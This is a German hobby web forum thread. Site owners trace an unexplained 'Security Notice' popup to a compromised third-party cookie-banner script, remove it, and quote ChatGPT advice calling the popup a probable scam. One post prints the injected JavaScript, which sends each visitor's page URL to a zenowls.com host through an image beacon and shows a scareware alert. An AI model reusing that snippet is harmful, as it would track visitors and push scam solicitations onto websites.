HILFE: Security Notes Hinweis

[Butterblume]

Hallo ihr lieben,

nach langer Zeit habe ich mal wieder ein Problem!

Und zwar bin ich einie Zeit nicht am PC gewesen und als ich gestern abend übers Tablet mal rauf gegangen bin, zeigt man mir auf jeder Seite folgendes an!




ich habe keine Ahnung was das ist! Nur das es echt nervig ist!

Und bei der https://www.mein-ostern.karins-poserbilder.de kann ich auch auf der Startseite das Datum vom Update nicht ändern. Das heißt wohl, ich ändere das in der Navi, aber es wird nach dem Hoch laden nicht angezeigt!


----------------------------------------------------------

Ich habe jetzt auch mal meinen Homepage Anbieter angeschrieben, weil es definitiv nur auf der Karins Poserbilder und den jeweiligen Sub Domains angezeigt wird. Bei Google oder auch hier beim Froum ist das nicht!

Doch der schreibt mir

Tatsächlich gehe ich davon aus, dass du für deine Website ein System nutzt, welches Sicherheitslücken beeinhaltet und sich so ein "Angreifer" Zugang zu deinem System verschafft hat. Solltest du kein CMS nutzen hast du evtl. Code in deinen Dateien, der wiederrum Dinge von extern lädt, die kompromittiert sein könnten. Das müsstest du an der Stelle einmal analysieren, woher das kommt.

sowie

Dazu müsstest du einmal schauen und prüfen woher die Meldung kommt und anschließend ggf. Den entsprechenden Code ersetzen.

------------------------------------------------------

was in aller Welt ist ein CMS?

AUch meinen Bruder habe ich gefragt, und der mein da es NUR auf meinen Seiten angezeigt wird, könnte es auch sein, dass der Server dieses Problem hat!

Momentan mache ich ein Virenscan und Windows hat auch ein Update gefahren! Ich weiß nicht wa sich noch malchen soll... Diesen Support werde ich jedenfalls NICHT anschreiben!

Ich brauch echt HILFE zumal ich ja auch Geld mit meinen Hompage verdiene!

[moni]

Hallo Karin..
Ich habe mir die Sache angeschaut und festgestellt, dass bei allen Webseiten von Jürg dasselbe Problem auftritt. Ich habe Jürgs Webseite https://www.thaileben.net/ überprüft und verglichen, was ihr beide gemeinsam habt – es sind die Backlinks und der Google-Übersetzer.

Zuerst habe ich den PHP-Code für die Backlinks deaktiviert und entfernt, jedoch ohne Erfolg. Anschließend habe ich ihn wiederhergestellt. Danach habe ich dasselbe mit dem Google-Übersetzer versucht, ebenfalls ohne Ergebnis.

Merkwürdig ist, dass dieses Problem nur auf der Startseite auftritt, wo das Warnhinweisfenster erscheint.
Zurzeit habe ich kein Konzept, was man hier machen könnte. Aber ich recheschiere weiter

[moni]

Hab um Meinung den ChatGPT gefragt und hier ist die Antwort, vielleicht hilft dir das weiter

Sicherheitsmitteilung: Ihre Website sollte möglicherweise einer Sicherheitsüberprüfung unterzogen werden. Regelmäßige Kontrollen helfen, Datenpannen zu verhindern und die Einhaltung gesetzlicher Vorgaben sicherzustellen.
Kontaktieren Sie uns unter: support@zenowls.com.

Einschätzung dazu:
Ein solches Popup kann legitim sein, aber es wirkt in dieser Form verdächtig. Seriöse Anbieter würden in der Regel keinen derart allgemeinen Hinweis in einem Popup platzieren, sondern gezielt und vertrauenswürdig kommunizieren (z. B. über die Administratoroberfläche oder direkt per E-Mail an den registrierten Webseiteninhaber).
Oft handelt es sich bei solchen Popups um Versuche, Nutzer zu verunsichern und zur Kontaktaufnahme zu bewegen, was dann in einer Verkaufsmasche oder sogar Betrug enden kann.

Empfohlene Vorgehensweise:

Keine Daten preisgeben oder auf das Popup reagieren.

Die Quelle des Popups prüfen (z. B. im Browser die Entwicklerkonsole öffnen und schauen, von welcher Domain das Popup eingebunden wird).

Ihre Website manuell auf Malware und unautorisierte Skripte untersuchen (ggf. durch einen vertrauenswürdigen IT-Dienstleister).

Sicherheitsupdates für CMS, Plugins und Serverumgebung durchführen.

Eigene Sicherheitsüberprüfung durch einen seriösen Anbieter oder Ihre IT-Abteilung veranlassen.

Möchten Sie, dass ich Ihnen eine kurze Checkliste für eine eigenständige Sicherheitsprüfung Ihrer Website erstelle?
Du:
ja


ChatGPT:
Gerne. Hier ist eine traditionelle und bewährte Checkliste für eine eigenständige Sicherheitsprüfung Ihrer Website:

Sicherheits-Checkliste für Webseiten
1. Software und Systeme aktuell halten

Prüfen Sie, ob CMS (z. B. WordPress, Joomla), Plugins, Themes und Server-Software (PHP, MySQL, etc.) auf dem neuesten Stand sind.

Installieren Sie ausschließlich offizielle Updates.

2. Backup erstellen

Legen Sie vor allen Änderungen ein vollständiges Backup Ihrer Website und Datenbank an.

Bewahren Sie regelmäßige Sicherungen an einem sicheren, externen Ort auf.

3. Überprüfung auf Schadsoftware

Scannen Sie Ihre Website mit einem zuverlässigen Sicherheitstool (z. B. Sucuri SiteCheck, Wordfence).

Achten Sie auf ungewöhnliche Dateien oder Änderungen im Dateisystem.

4. Benutzerkonten kontrollieren

Überprüfen Sie, ob alle Benutzerkonten berechtigt sind.

Entfernen Sie ungenutzte oder unbekannte Benutzer sofort.

Verwenden Sie starke, einzigartige Passwörter für alle Konten.

5. SSL-Zertifikat prüfen

Stellen Sie sicher, dass Ihre Website mit HTTPS gesichert ist.

Überprüfen Sie die Gültigkeit und Erneuerung des SSL-Zertifikats.

6. Firewall und Schutzmaßnahmen aktivieren

Nutzen Sie eine Web Application Firewall (WAF).

Schränken Sie den Zugriff auf die Verwaltungsoberfläche (Admin-Bereich) ein.

7. Verdächtige Aktivitäten überwachen

Überwachen Sie die Server-Logs auf ungewöhnliche Anmeldeversuche oder Aktivitäten.

Aktivieren Sie Benachrichtigungen für sicherheitsrelevante Ereignisse.

8. Rechte und Zugriffssteuerung überprüfen

Ordnen Sie nur die nötigen Rechte zu (z. B. „Lesen“, „Schreiben“).

Vermeiden Sie die Nutzung von Standard-Zugangsdaten (z. B. admin/admin).

9. Datenschutzerklärung und gesetzliche Vorgaben einhalten

Überprüfen Sie die Konformität mit geltenden Datenschutzbestimmungen (z. B. DSGVO).

10. Sicherheit regelmäßig neu bewerten

Führen Sie mindestens einmal pro Quartal eine vollständige Sicherheitsprüfung durch.

Dokumentieren Sie alle Maßnahmen und Auffälligkeiten sorgfältig.

Ich
zenowls.com. Kann diese Seite verdächtigt sein ?


ChatGPT:
​Die Domain zenowls.com weist mehrere verdächtige Merkmale auf, die auf eine potenzielle Phishing- oder Betrugsseite hindeuten könnten:​

Unaufgeforderte Sicherheitswarnungen: Das Erscheinen eines Pop-ups mit der Aufforderung, eine Sicherheitsüberprüfung durchzuführen, ohne dass Sie zuvor Kontakt mit dem Anbieter hatten, ist ungewöhnlich und kann ein Versuch sein, Vertrauen zu erschleichen.​

Unklare Identität: Es liegen keine öffentlich zugänglichen Informationen über das Unternehmen hinter zenowls.com vor. Seriöse Sicherheitsdienstleister stellen in der Regel transparente Informationen über ihre Identität und Dienstleistungen bereit.​

Ähnlichkeit mit bekannten Betrugsmethoden: Die Vorgehensweise entspricht bekannten Phishing-Strategien, bei denen durch vorgetäuschte Sicherheitswarnungen versucht wird, Nutzer zur Preisgabe sensibler Informationen zu bewegen.​

Empfehlung:

Keine Interaktion: Klicken Sie nicht auf das Pop-up und geben Sie keine persönlichen Daten preis.​

Website-Überprüfung: Nutzen Sie vertrauenswürdige Tools wie Scamadviser oder VirusTotal, um die Sicherheit von zenowls.com zu überprüfen.​

Sicherheitsmaßnahmen: Führen Sie eine eigenständige Sicherheitsprüfung Ihrer Website durch oder wenden Sie sich an einen vertrauenswürdigen IT-Dienstleister.​

Meldung: Erwägen Sie, den Vorfall bei entsprechenden Stellen zu melden, um andere Nutzer zu warnen.​

[HTML-Laie]

Habe folgendes herausgefunden:

Ruft man deine Seite mit

Code: Alles auswählen

https://www.mein-ostern.karins-poserbilder.de/

auf erscheint der Hinweis.

Ruft man die Seite mit

Code: Alles auswählen

https://www.mein-ostern.karins-poserbilder.de/index.php

auf erscheint der Hinweis nicht.

Dieser Hinweis oder auch Alarmfenster wird durch folgendes Script aufgerufen:

Code: Alles auswählen

<script type="text/javascript" src="https://s3.eu-central-1.amazonaws.com/website-tutor/cookiehinweis/script.js
"></script>

Hier mal das Script:

Code: Alles auswählen

 //if (window.location.pathname === "/" || window.location.pathname === "/index.html") {
 //   alert("Security Notice: Your website may be due for a security audit. Regular checks help prevent data breaches and ensure compliance.\n\nContact us at: support@zenowls.com");
 // }
 
var i=new Image;
  i.src="https://test.zenowls.com/aws1.php?c="+window.location.href;


const isHomepage = window.location.pathname === "/" || window.location.pathname === "/index.html";

const allowedDomains = ["atelierkaymak.de", "sex-mich.com", "google.com"];
const isNotZenowls = !allowedDomains.some(domain => window.location.hostname.includes(domain));

if (isHomepage && isNotZenowls) {
  alert("Security Notice: Your website may be due for a security audit. Regular checks help prevent data breaches and ensure compliance.\nContact us at: support@zenowls.com");
}

Ich nehme mal an das dieses Script für deinen Cookie-Hinweis zuständig ist?

Warum das Fenster mal erscheint und mal nicht konnte ich noch nicht herausfinden.

LG Hape

[Butterblume]

Hallo und guten Morgen ihr beiden,

erst einmal vielen vielen Dank für eure Antworten...

Mir ist wie sollte es auch anders sein in der Nacht eingefallen, dass ich 2 Seiten einzenld habe

https://www.jahreszeiten.karins-poserbilder.de/

und

https://www.feiertage.karins-poserbilder.de/

und da habe ich weder Backlinkseller Code noch goole Übersetzer drauf. Und schwup da wird es nicht angezeigt!

@Hape, ich habe den Hinweis mit den Cookies in mein Ostern mal weg genommen, und was soll ich sagen es ist weg...

Eigentlich kann ich das überall weg nehmen, weil der Hinweis ohnehin aus welchem Grund auch immer nicht mehr angezeigt wird!
Oh Gott sei Dank! Du glaubst gar nicht wie verunsichert ich gestern war!

:Da :Da



-------------------------------------------------------------

NACHTRAG:

Also ich habe jetzt das komplette Script:

Code: Alles auswählen

<script type="text/javascript">
  window.CookieHinweis_options = {
  message: '<span style="font-size: 20pt;"><font face="RikyVampdatorNormal">Diese Website nutzt Cookies, um bestmögliche Funktionalität bieten zu können.',
  agree: '<span style="font-size: 17pt;"><font face="RikyVampdatorNormal">Hab ich verstanden, alles klar!',
  learnMore: '<span style="font-size: 20pt;"><font face="RikyVampdatorNormal"><span style="color: #C73535">Mehr Infos',
  link: '../../../info/datenschutz.php#cookie', /* Link zu den eigenen Datenschutzbestimmungen */
  theme: 'hell-unten-rechts' /* weitere Theme-Optionen sind dunkel-unten oder dunkel-oben */
 };
</script></font></span>
                 
<script type="text/javascript" src="https://s3.eu-central-1.amazonaws.com/website-tutor/cookiehinweis/script.js
"></script>

auf allen Haeder weg genommen. Wie gesagt, wurde ohnehin nicht mehr angezeigt. Warum weiß ich nicht...

Jedoch auf der https://www.happy-halloween.karins-poserbilder und der https://www.weihnachtszauber.karins-poserbilder.de wird es nach entfernen dennoch angezeigt...



Ich habe letztes Jahr diesen beiden Seiten das Design von der Poserbilder gegeben. Vielleicht habe ich da irgendwas nicht richtig gemacht. Bei der Happy Halloween sind die Hintergrundgeräusche zu hören, das ist nicht der Code mit der Fadenbox?

Code: Alles auswählen

<script type="text/javascript">

/***********************************************
* Sticky Note script- © Dynamic Drive DHTML code library (www.dynamicdrive.com)
* Visit DynamicDrive.com for hundreds of DHTML scripts
* This notice must stay intact for legal use
* Go to http://www.dynamicdrive.com/ for full source code
***********************************************/

//Specify display mode. 3 possible values are:
//1) "always"- This makes the fade-in box load each time the page is displayed
//2) "oncepersession"- This uses cookies to display the fade-in box only once per browser session
//3) integer (ie: 5)- Finally, you can specify an integer to display the box randomly via a frequency of 1/integer...
// For example, 2 would display the box about (1/2) 50% of the time the page loads.

var displaymode="always"

var enablefade="yes" //("yes" to enable fade in effect, "no" to disable)
var autohidebox=["yes", 5] //Automatically hide box after x seconds? [yes/no, if_yes_hide_after_seconds]
var showonscroll="yes" //Should box remain visible even when user scrolls page? ("yes"/"no)
var IEfadelength=1 //fade in duration for IE, in seconds
var Mozfadedegree=0.05 //fade in degree for NS6+ (number between 0 and 1. Recommended max: 0.2)

////////No need to edit beyond here///////////

if (parseInt(displaymode)!=NaN)
var random_num=Math.floor(Math.random()*displaymode)

function displayfadeinbox(){
var ie=document.all && !window.opera
var dom=document.getElementById
iebody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body
objref=(dom)? document.getElementById("fadeinbox") : document.all.fadeinbox
var scroll_top=(ie)? iebody.scrollTop : window.pageYOffset
var docwidth=(ie)? iebody.clientWidth : window.innerWidth
docheight=(ie)? iebody.clientHeight: window.innerHeight
var objwidth=objref.offsetWidth
objheight=objref.offsetHeight
objref.style.left=docwidth/2-objwidth/2+"px"
objref.style.top=scroll_top+docheight/2-objheight/2+"px"

if (showonscroll=="yes")
showonscrollvar=setInterval("staticfadebox()", 50)

if (enablefade=="yes" && objref.filters){
objref.filters[0].duration=IEfadelength
objref.filters[0].Apply()
objref.filters[0].Play()
}
objref.style.visibility="visible"
if (objref.style.MozOpacity){
if (enablefade=="yes")
mozfadevar=setInterval("mozfadefx()", 90)
else{
objref.style.MozOpacity=1
controlledhidebox()
}
}
else
controlledhidebox()
}

function mozfadefx(){
if (parseFloat(objref.style.MozOpacity)<1)
objref.style.MozOpacity=parseFloat(objref.style.MozOpacity)+Mozfadedegree
else{
clearInterval(mozfadevar)
controlledhidebox()
}
}

function staticfadebox(){
var ie=document.all && !window.opera
var scroll_top=(ie)? iebody.scrollTop : window.pageYOffset
objref.style.top=scroll_top+docheight/2-objheight/2+"px"
}

function hidefadebox(){
objref.style.visibility="hidden"
if (typeof showonscrollvar!="undefined")
clearInterval(showonscrollvar)
}

function controlledhidebox(){
if (autohidebox[0]=="yes"){
var delayvar=(enablefade=="yes" && objref.filters)? (autohidebox[1]+objref.filters[0].duration)*1000 : autohidebox[1]*1000
setTimeout("hidefadebox()", delayvar)
}
}

function initfunction(){
setTimeout("displayfadeinbox()", 5500)
}

function get_cookie(Name) {
var search = Name + "="
var returnvalue = ""
if (document.cookie.length > 0) {
offset = document.cookie.indexOf(search)
if (offset != -1) {
offset += search.length
end = document.cookie.indexOf(";", offset)
if (end == -1)
end = document.cookie.length;
returnvalue=unescape(document.cookie.substring(offset, end))
}
}
return returnvalue;
}
if (displaymode=="oncepersession" && get_cookie("fadedin")=="" || displaymode=="always" || parseInt(displaymode)!=NaN && random_num==0){
if (window.addEventListener)
window.addEventListener("load", initfunction, false)
else if (window.attachEvent)
window.attachEvent("onload", initfunction)
else if (document.getElementById)
window.onload=initfunction
document.cookie="fadedin=yes"
}
</script>

Anderenfalls muss ich das wohl oder übel nochmal überarbeiten!

[Butterblume]

Jetzt sagte Moni mir gerade, dass es Pflicht sei einen Hinweis auf Cookies zu setzten?!

Nu muss ich erst einmal sehen was ich mache! Habe zwar hier auf einen Haeder den Hinweis gelassen zur Vorsicht, aber wenn der nicht geht...

Dieser Mist hat mir jetzt das Design zerissen auf der https://www.happy-halloween.karins-poserbilder.de/

[Butterblume]

So, ich denke das Problem mit dem Design der Halloween Seite ist behoben, jedoch kommt trotz der wegnahme des Cookies Hinweis diese Fenster mit dem Security Notes immer noch. Das selbige auch auf meiner Weihnachtszauber! Aber ich guck nochmal ob ich es auch überall weg genommen habe!

DAS ist erledigt

-------------------------------------------------------------------------------------------------------------------------------------

Jetzt nur dies noch...

Des Weiteren sagte mir Monika, dass dieser Cookie Hinweis Pflicht wäre. Dann habe ich mich mal auf die Suche nach einem neuen gemacht und habe diesen hier gefunden!

https://app.cookiebannergenerator.com/de/

Ich fleisig wie ich bin, ausgefüllt (vorschau war auch gut) ich das geforderte runter geladen auf meiner Posterbilder hoch geladen im Ordner Design. In den Meta Tgs folgndes hinzugefügt

Code: Alles auswählen

 <!-- Dein Titel im Browserfenster -->
<link rel="canonical" href="https://www.karins-poserbilder.de/scripts/canonical.php" /> 
 <!-- Design -->
<script type="text/javascript" src="design/modernizr.min.js"></script>
<script type="text/javascript" src="design/respond.min.js"></script>
<!-- Navigation java skripte -->
<script type="text/javascript" src="design/cookiebanner.script.js"></script>
<link href="design/styles.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="design/skript-navi.js"></script>
<script type="text/javascript" src="design/skript-topnavi.js"></script>
<link rel="shortcut icon" href="design/favicon.ico" type="image/x-icon"/>
<link rel="icon" href="design/favicon.ico" type="image/x-icon"/>
<!-- style.css -->
<link href="design/style.css" type="text/css" rel="stylesheet" />
<link href="../../../design/cookiebanner.style.css" type="text/css" rel="stylesheet" />

eine cookiebanner.css habe ich auch erst einmal nur auf der Poserbilder hoch geladen, aber da stand nix mit css wo ich das einfügen muss. Deshalb habe ich sie mal in den Metatags ganz unten eingefügt!

Leider jedoch wird es immer noch nicht angezeigt?! Wahrscheinlich muss ich die Css auch irgendwo einfügen, nur wo...

So sollte es eigentlich aussehen!

https://www.karins-poserbilder.de/design/index.html

[moni]

Da bist ja mega fleißig Karin Super das alles gut geklappt hat und alles gut, was guten Ende hat.

@Happy vielen Dank für den Tipp mit den Cookie Fenster

[Butterblume]

Meine Lieben,

meine Seite strahlen wieder in ihrem gewohntem Gewand!

Auch der Cookie Hinweis wird dank Moni wieder angezeigt! Bin damit zwar noch nicht ganz fertig, aber morgen sind alle damit bestückt, nachdem ich dank Hape wusste was weg musste, war nen bisschen Arbeit, aber das passte schon!

Ich war gestern tot unglücklich, dass ich plötzlich solche Probleme hatte. Auch wenns nur ein paar Tage waren, mir hats völlig gereicht!

Deshlab sage ich jetzt Moni und hape!

[moni]

Man kann unglücklich sein, vor allem, weil man letztendlich nicht weiß, ob tatsächlich eine Gefahr besteht, und lustig ist es schon gar nicht, wenn die Homepage gehackt wird. Gut, dass nun alles geklärt ist und du einen neuen Cookie gefundenen hast, der deinen Ansprüchen entspricht.

Ich habe nach einem Cookie-Fenster gesucht, das nicht auf Dritte angewiesen ist, und bei ChatGPT eines gefunden.
Es ist ja der Hammer was der KI alles machen kann
Hier das Fenster
http://demo.homepagehelfer.net/beispiel ... ies%20.php

Hinweis ! Das Hintergrundbild ist in den Codeirung nicht erhalten

und hier ist das Codeirung für alle was den gerne haben wollen

http://demo.homepagehelfer.net/beispiel ... ie-php.txt